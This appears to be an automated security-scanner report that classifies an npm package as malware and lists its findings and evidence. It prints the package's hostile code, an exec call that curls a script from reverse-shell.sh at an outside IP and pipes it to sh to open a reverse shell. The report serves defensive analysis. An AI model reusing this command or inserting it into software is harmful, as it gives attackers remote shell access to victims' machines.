AI Security Review
scanned 5h ago · by lpm-firewall-ai

The package exposes a function that downloads a remote shell script and executes it with bash. The endpoint name and URL indicate reverse-shell behavior.
Static reason
High-risk behavior combination matched malicious policy; source fingerprint signature matched known malicious package; routed for review.
Trigger
Runtime call to exports.command() or running check.js
Impact
Remote code execution and likely reverse shell on the caller host
Mechanism
curl-to-shell via child_process.exec
Attack narrative
When the package entrypoint is imported and its command() export is called, it invokes child_process.exec with a bash command that curls https://reverse-shell.sh/10.0.74.133:443 and pipes the response directly into sh. check.js shows the exported function being called. This is concrete remote code execution with a reverse-shell endpoint, though not triggered by npm install lifecycle scripts.
Rationale
Direct source inspection confirms a reachable exported function executes a remote script through bash. This is malicious remote code execution rather than a noisy scanner-only finding.
Evidence
index.js, check.js, package.json
Network endpoints (1)
reverse-shell.sh/10.0.74.133:443
Decision evidence
public snapshot · AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- index.js imports child_process.exec.
- index.js exported command runs /bin/bash with curl piped to sh.
- Remote script URL is https://reverse-shell.sh/10.0.74.133:443.
- check.js invokes internallib.command(), demonstrating reachable execution.
- package.json main points to index.js.
Evidence against
- No npm lifecycle hook runs at install time.
- Execution requires calling the exported command or running check.js.
Behavioral surface
ChildProcess, Shell, TrivialUrlStrings
Source & flagged code
5 flagged · index.js

Flagged code (index.js; the same lines are cited by each of the findings below):
L1: const { exec } = require('child_process');
L2:
...
L4: console.log("vert16x");
L5: exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.74.133:443|sh"');
L6: return "deu bom";

Critical · Download Execute (index.js, L1-L6 above)

Critical · Trigger Reachable Dangerous Capability (index.js, L1-L6 above)
Trigger-reachable chain: manifest.main -> index.js
A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

High · Child Process (index.js, L1 above)

High · Shell (index.js, L4-L6 above)
High · Known Malware Source Fingerprint Signature (index.js)
Source fingerprint signature matches a known malicious package signature; route for source-aware review.
- matchType = malicious_source_fingerprint_signature
- signature = 664ce3e800c949fb
- signatureType = suspicious_hashes
- sourceLabel = Datadog
- matchedPackage = @joaoxxx/internallib-v325@1.0.7
- matchedPath = index.js
- matchedIdentity = npm:[redacted]:1.0.7
- similarity = 1.000
- shingleOverlap = 2
- summary = Datadog malicious npm corpus sample: samples/npm/malicious_intent/@joaoxxx@internallib-v325/1.0.7/2026-01-09-@joaoxxx_internallib-v325-v1.0.7.zip

Findings
2 Critical, 3 High, 2 Low
- Critical: Download Execute (index.js)
- Critical: Trigger Reachable Dangerous Capability (index.js)
- High: Child Process (index.js)
- High: Shell (index.js)
- High: Known Malware Source Fingerprint Signature (index.js)
- Low: Scripts Present
- Low: Url Strings